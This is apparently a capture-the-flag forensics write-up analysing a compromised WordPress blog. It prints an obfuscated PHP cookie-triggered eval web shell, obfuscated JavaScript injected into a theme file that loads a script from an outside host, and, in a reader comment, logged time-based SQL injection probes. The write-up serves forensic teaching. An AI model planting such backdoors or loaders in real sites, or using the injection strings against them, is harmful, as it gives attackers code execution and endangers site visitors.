CSAW14 – Fluffy no more (Forensic 300)

September 24, 2014

Description

OH NO WE’VE BEEN HACKED!!!!!! — said the Eye Heart Fluffy Bunnies Blog owner. Life was grand for the fluff fanatic until one day the site’s users started to get attacked! Apparently fluffy bunnies are not just a love of fun furry families but also furtive foreign governments. The notorious “Forgotten Freaks” hacking group was known to be targeting high powered politicians. Were the cute bunnies the next in their long list of conquests!??
Well… The fluff needs your stuff. I’ve pulled the logs from the server for you along with a backup of it’s database and configuration. Figure out what is going on!
Written by brad_anton

Here we have a WordPress blog that has been compromised.

A (quick) look in the folder named “html” shows an interesting “upload”-folder with an even more interesting template.php file:

<?php
 $hije = str_replace("ey","","seyteyrey_reyeeypleyaeyceye");
 $andp="JsqGMsq9J2NvdW50JzskYT0kX0NPT0tJRTtpZihyZXNldCgkYSsqk9PSdoYScgJisqYgsqJsqGMoJ";
 $rhhm="nsqKSwgam9pbihhcnJheV9zbGljZSgkYSwksqYygkYSksqtMykpKSksqpO2VjaG8sqgJsqzwvJy4kay4nPic7fQ==";
 $pvqw="GEpPjMpeyRrPSdja2l0JztlY2hvICc8Jy4kaysq4nPicsq7ZXZhbChsqiYXNlNjRfZGVjb2RlKHByZsqWdfcmVw";
 $wfrm="bGFjZShhcnsqJheSsqgsqnsqL1teXHcsq9XHNdLycsJy9ccy8nKSwgYsqXJyYXksqoJycsJyssq";
 $vyoh = $hije("n", "", "nbnansne64n_ndnecode");
 $bpzy = $hije("z","","zczreaztzez_zfzuznzcztzizon");
 $xhju = $bpzy('', $vyoh($hije("sq", "", $andp.$pvqw.$wfrm.$rhhm))); $xhju();
 ?>

After deobfuscation:

<?php
 $c='count';$a=$_COOKIE;
 if(reset($a)=='ha' && $c($a)>3){
   $k='ckit';
   echo '<'.$k.'>';
   eval(
     base64_decode(
       preg_replace(
         array('/[^\w=\s]/','/\s/'),
         array('','+'),
         join(
           array_slice($a,$c($a)-3))
         )
       )
   );
   echo ‘</'.$k.'>';
 }
?>

So if someone calls this page with specific cookies, he could be able to get a shell.

Let’s check the access.log if someone called it:

7534: 192.168.127.140 - - [16/Sep/2014:20:42:54 +0000] "POST /wp-admin/admin-post.php?page=wysija_campaigns&action=themes HTTP/1.1" 302 385 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
7535: 192.168.127.140 - - [16/Sep/2014:20:42:54 +0000] "GET /wp-content/uploads/wysija/themes/weblizer/template.php HTTP/1.1" 200 165 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”

Ok so someone with the IP 192.168.127.140 has access to the web server. What did he do?

Looking in /var/log/auth.log, there is something interesting:

Sep 17 19:20:09 ubuntu sudo: ubuntu : TTY=pts/0 ; PWD=/home/ubuntu/CSAW2014-WordPress/var/www ; USER=root ; COMMAND=/usr/bin/vi /var/www/html/wp-content/themes/twentythirteen/js/html5.js

So let’s have a look at this file. If we compare it with the original (https://code.google.com/p/html5shiv/source/browse/trunk/html5.js?r=32) we can see that some code was added at the end

var g = "ti";
var c = "HTML Tags";
var f = ". li colgroup br src datalist script option .";
f = f.split(" ");
c = "";
k = "/";
m = f[6];
for (var i = 0; i < f.length; i++) {
 c += f[i].length.toString();
}
v = f[0];
x = "\'ht";
b = f[4];
f = 2541 * 6 - 35 + 46 + 12 - 15269;
c += f.toString();
f = (56 + 31 + 68 * 65 + 41 - 548) / 4000 - 1;
c += f.toString();
f = "";
c = c.split("");
var w = 0;
u = "s";
for (var i = 0; i < c.length; i++) {
 if (((i == 3 || i == 6) && w != 2) || ((i == 8) && w == 2)) {
 f += String.fromCharCode(46);
 w++;
 }
 f += c[i];
}
i = k + "anal";
document.write("<" + m + " " + b + "=" + x + "tp:" + k + k + f + i + "y" + g + "c" + u + v + "j" + u + "\'>\</" + m + "\>");

After deobfuscation:

<script src=‘http://128.238.66.100/analytics.js'></script>

So now we look at this javascript (a whois on the server shows that it belongs to “United States Brooklyn Polytechnic University” so we are on the right way 😉 ).
It looks like a normal analytic script but in the middle there is something hidden:

var _0x91fe = ["\x68\x74\x74\x70\x3A\x2F\x2F\x31\x32\x38\x2E\x32
\x33\x38\x2E\x36\x36\x2E\x31\x30\x30\x2F\x61\x6E\x6E\x6F\x75\x6E
\x63\x65\x6D\x65\x6E\x74\x2E\x70\x64\x66", "\x5F\x73\x65\x6C\x66",
"\x6F\x70\x65\x6E"];
 window[_0x91fe[2]](_0x91fe[0], _0x91fe[1]);

After deobfuscation:

window[open](http://128.238.66.100/announcement.pdf,_self);

So let’s open the pdf!

Still no flag… Let’s go deeper. We open the file with PDFStreamDumper and there is another obfuscated javascript

var _0xee0b = ["\x59\x4F\x55\x20\x44\x49\x44\x20\x49\x54\x21\x20
\x43\x4F\x4E\x47\x52\x41\x54\x53\x21\x20\x66\x77\x69\x77\x2C\x20
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x20\x6F\x62\x66\x75\x73
\x63\x61\x74\x69\x6F\x6E\x20\x69\x73\x20\x73\x6F\x66\x61\x20\x6B
\x69\x6E\x67\x20\x64\x75\x6D\x62\x20\x20\x3A\x29\x20\x6B\x65\x79
\x7B\x54\x68\x6F\x73\x65\x20\x46\x6C\x75\x66\x66\x79\x20\x42\x75
\x6E\x6E\x69\x65\x73\x20\x4D\x61\x6B\x65\x20\x54\x75\x6D\x6D\x79
\x20\x42\x75\x6D\x70\x79\x7D"];var y=_0xee0b[0];

After another (and last) deobfuscation, we finally get the flag:
YOU DID IT! CONGRATS! fwiw, javascript obfuscation is sofa king dumb 🙂

flag{Those Fluffy Bunnies Make Tummy Bumpy}

2 Responses to “CSAW14 – Fluffy no more (Forensic 300)”

  1. The file \var\www\html\wp-content\uploads\wysija\themes\weblizer\template.php ?
    It appears to me like they got rooted and they were able to install weevely. I’m pretty sure that’s the shell they have install.

    What do you think? How do you think they got rooted?

    There are a lot of entries in the apache log file suggesting an attack:

    192.168.127.137 – – [16/Sep/2014:14:41:08 +0000] “GET /?page_id=1+or+sleep%287%29%23 HTTP/1.1” 301 422 “-” “Python-httplib2/0.7.4 (gzip)”
    192.168.127.137 – – [16/Sep/2014:14:41:08 +0000] “GET /?page_id=%22+or+sleep%287%29%23 HTTP/1.1” 200 2852 “-” “Python-httplib2/0.7.4 (gzip)”
    192.168.127.137 – – [16/Sep/2014:14:41:08 +0000] “GET /?page_id=%27+or+sleep%287%29%23 HTTP/1.1” 200 2852 “-” “Python-httplib2/0.7.4 (gzip)”
    192.168.127.137 – – [16/Sep/2014:14:41:08 +0000] “GET /?page_id=%22+or+sleep%287%29%3D%22 HTTP/1.1” 200 2852 “-” “Python-httplib2/0.7.4 (gzip)”
    192.168.127.137 – – [16/Sep/2014:14:41:08 +0000] “GET /?page_id=%27+or+sleep%287%29%3D%27 HTTP/1.1” 200 2852 “-” “Python-httplib2/0.7.4 (gzip)”

    Which one, in the whole log, was able to upload the weevely payload, do you think?

  2. Hi Mike,
    you can check the other write up here http://sugarstack.io/csaw2014-fluffy-no-more/ and the vulnerability in the MailPoet plugin http://blog.sucuri.net/2014/07/mailpoet-vulnerability-exploited-in-the-wild-breaking-thousands-of-wordpress-sites.html
    He came to the same conclusion with the template file but couldn’t find the shell either

Leave a Reply